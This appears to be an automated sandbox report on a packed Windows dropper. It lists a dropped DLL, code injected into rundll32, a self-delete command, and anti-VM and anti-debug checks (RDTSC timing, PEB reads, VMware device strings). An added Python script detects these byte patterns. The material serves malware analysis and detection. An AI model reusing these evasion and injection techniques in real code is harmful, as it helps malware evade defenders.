Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004041E5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar, 0_2_004020A6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File created: C:\Users\user\AppData\Local\Temp\nsvE791.tmp
Source: NdBLyH2h5d.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: NdBLyH2h5d.exe Virustotal: Detection: 20%
Source: NdBLyH2h5d.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File read: C:\Users\user\Desktop\NdBLyH2h5d.exe
Source: unknown Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Unpacked PE file: 1.2.NdBLyH2h5d.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
PE file contains sections with non-standard names
Source: 6oxdti6l9qd.dll.0.dr Static PE information: section name: .code
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C8CC push es; ret 1_2_0041C8D3
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041925A push esp; retf 1_2_0041925F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B3F2 push eax; ret 1_2_0041B3F8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B3FB push eax; ret 1_2_0041B462
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B3A5 push eax; ret 1_2_0041B3F8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B45C push eax; ret 1_2_0041B462
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A5D0D1 push ecx; ret 1_2_00A5D0E4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C8CC push es; ret 1_1_0041C8D3
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041925A push esp; retf 1_1_0041925F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B3F2 push eax; ret 1_1_0041B3F8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B3FB push eax; ret 1_1_0041B462
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B3A5 push eax; ret 1_1_0041B3F8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B45C push eax; ret 1_1_0041B462
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0465D0D1 push ecx; ret 6_2_0465D0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB925A push esp; retf 6_2_02BB925F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBB3A5 push eax; ret 6_2_02BBB3F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBB3FB push eax; ret 6_2_02BBB462
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBB3F2 push eax; ret 6_2_02BBB3F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC8CC push es; ret 6_2_02BBC8D3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBB45C push eax; ret 6_2_02BBB462

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File created: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002BA85E4 second address: 0000000002BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002BA896E second address: 0000000002BA8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004088A0 rdtsc 1_2_004088A0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6540 Thread sleep time: -70000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 0_2_00405301
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 0_2_00405C94
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004026BC FindFirstFileA, 0_2_004026BC
Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000004.00000000.228623277.00000000056A1000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.233670194.0000000008907000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.233210221.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.492571726.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.233471521.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000004.00000000.228573395.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process information queried: ProcessInformation
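The RDTSC entries above and the fs:[30h] PEB reads listed under Anti Debugging below are byte patterns that can be re-found statically in an unpacked dump, independent of the sandbox. The following Python script is an added example, not part of this report and not code from the sample: it scans a raw code buffer for the exact back-to-back rdtsc sequence the report shows (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc), for mov r32, dword ptr fs:[30h] PEB reads, and for adjacent push/ret gadgets of the kind listed under Data Obfuscation. The buffer it scans, the instructions around the patterns and the image base 0x401000 are all constructed for the demonstration.

```python
import re
from dataclasses import dataclass
from typing import List

# rdtsc ; xor ecx, ecx ; add ecx, eax ; rdtsc  (the sequence the RDTSC entries report).
# The disassembly does not pin the encoding, so both forms of xor and add are accepted.
RDTSC_PAIR = re.compile(rb"\x0f\x31(?:\x31|\x33)\xc9(?:\x01\xc1|\x03\xc8)\x0f\x31")

# mov r32, dword ptr fs:[30h]: 64 A1 30 00 00 00 (eax short form) or 64 8B /r 30 00 00 00
PEB_READ = re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00")

# push r32 / push sreg directly followed by ret or retf. Only the adjacent form is
# matched; the report's push/ret pairs may have other instructions between them.
PUSH_RET = re.compile(rb"[\x50-\x57\x06\x0e\x16\x1e][\xc3\xcb]")

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SREG = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}


@dataclass
class Hit:
    kind: str      # "rdtsc_pair", "peb_read" or "push_ret"
    offset: int    # virtual address: buffer offset plus image base
    text: str      # human-readable description of the matched instructions


def describe_peb_read(m: bytes) -> str:
    if m[1] == 0xA1:
        return "mov eax, dword ptr fs:[30h]"
    return f"mov {REG32[(m[2] >> 3) & 7]}, dword ptr fs:[30h]"


def describe_push_ret(m: bytes) -> str:
    src = SREG.get(m[0]) or REG32[m[0] - 0x50]
    return f"push {src}; {'retf' if m[1] == 0xCB else 'ret'}"


def scan(buf: bytes, base: int = 0) -> List[Hit]:
    """Return every pattern hit in buf, ordered by address, with buf mapped at base."""
    hits: List[Hit] = []
    for m in RDTSC_PAIR.finditer(buf):
        # The second rdtsc is the last two bytes of the match, 6 bytes after the first,
        # which is the spacing the report shows (…85E4 -> …85EA, …896E -> …8974).
        first, second = base + m.start(), base + m.end() - 2
        hits.append(Hit("rdtsc_pair", first,
                        f"rdtsc at {first:#010x}, second rdtsc at {second:#010x}"))
    for m in PEB_READ.finditer(buf):
        hits.append(Hit("peb_read", base + m.start(), describe_peb_read(m.group())))
    for m in PUSH_RET.finditer(buf):
        hits.append(Hit("push_ret", base + m.start(), describe_push_ret(m.group())))
    return sorted(hits, key=lambda h: h.offset)


# Constructed code image (not bytes from the sample): a prologue, the report's RDTSC
# sequence, a PEB read that then fetches PEB.BeingDebugged (PEB+2), a second PEB read
# into ecx, and a push eax; ret gadget.
IMAGE_BASE = 0x401000  # assumed base for the demonstration
SAMPLE = (
    b"\x55\x8b\xec\x83\xec\x10"            # push ebp; mov ebp, esp; sub esp, 10h
    + b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"  # rdtsc; xor ecx, ecx; add ecx, eax; rdtsc
    + b"\x2b\xc1"                          # sub eax, ecx      (cycle delta)
    + b"\x64\xa1\x30\x00\x00\x00"          # mov eax, dword ptr fs:[30h]
    + b"\x0f\xb6\x40\x02"                  # movzx eax, byte ptr [eax+2]  (BeingDebugged)
    + b"\x64\x8b\x0d\x30\x00\x00\x00"      # mov ecx, dword ptr fs:[30h]
    + b"\x50\xc3"                          # push eax; ret
    + b"\xc9\xc3"                          # leave; ret
)

if __name__ == "__main__":
    for h in scan(SAMPLE, IMAGE_BASE):
        print(f"{h.offset:#010x}  {h.kind:<10}  {h.text}")
```

Run scan() over a dump of the unpacked image (for this sample the 1.2.NdBLyH2h5d.exe.400000.0.unpack region, with base 0x400000) and compare against the report. Two things are worth noticing when doing so. First, the rundll32 RDTSC hits sit at the same image offsets (…85E4 and …896E) as those in the sample's 0x400000 image, which is what you expect when the same code has been written into rundll32 rather than rundll32 having its own timing check. Second, a fs:[30h] read is not on its own evidence of an anti-debug check: ntdll and compiler runtime code read the PEB constantly, and most of the 1_2_00Axxxxx reads listed below fall in the same region of process 1 where the wntdll.pdb debug string was found (0x00AFF000), so a large share of them are probably a mapped ntdll copy rather than hand-written checks. Treat the count as a lead and confirm what each read feeds (BeingDebugged at PEB+2, NtGlobalFlag at PEB+0x68, or the loader lists used to resolve APIs by hand).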

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004088A0 rdtsc 1_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00409B10 LdrLoadDll, 1_2_00409B10
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect, 0_2_740D1000
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_02631868 mov eax, dword ptr fs:[00000030h] 0_2_02631868
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_02631650 mov eax, dword ptr fs:[00000030h] 0_2_02631650
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A490AF mov eax, dword ptr fs:[00000030h] 1_2_00A490AF
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3F0BF mov ecx, dword ptr fs:[00000030h] 1_2_00A3F0BF
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A3F0BF
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A3F0BF
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09080 mov eax, dword ptr fs:[00000030h] 1_2_00A09080
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h] 1_2_00A83884
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h] 1_2_00A83884
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h] 1_2_00A040E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h] 1_2_00A040E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h] 1_2_00A040E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A058EC mov eax, dword ptr fs:[00000030h] 1_2_00A058EC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A9B8D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] 1_2_00A1B02A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] 1_2_00A1B02A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] 1_2_00A1B02A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] 1_2_00A1B02A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] 1_2_00A3002D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h] 1_2_00AD4015
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h] 1_2_00AD4015
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h] 1_2_00A87016
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h] 1_2_00A87016
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h] 1_2_00A87016
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD1074 mov eax, dword ptr fs:[00000030h] 1_2_00AD1074
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC2073 mov eax, dword ptr fs:[00000030h] 1_2_00AC2073
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h] 1_2_00A20050
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h] 1_2_00A20050
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h] 1_2_00A361A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h] 1_2_00A361A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] 1_2_00AC49A4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] 1_2_00AC49A4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] 1_2_00AC49A4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] 1_2_00AC49A4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A869A6 mov eax, dword ptr fs:[00000030h] 1_2_00A869A6
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] 1_2_00A851BE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] 1_2_00A851BE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] 1_2_00A851BE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] 1_2_00A851BE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2C182 mov eax, dword ptr fs:[00000030h] 1_2_00A2C182
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A185 mov eax, dword ptr fs:[00000030h] 1_2_00A3A185
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32990 mov eax, dword ptr fs:[00000030h] 1_2_00A32990
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00A0B1E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00A0B1E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00A0B1E1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A941E8 mov eax, dword ptr fs:[00000030h] 1_2_00A941E8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov ecx, dword ptr fs:[00000030h] 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h] 1_2_00A3513A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h] 1_2_00A3513A
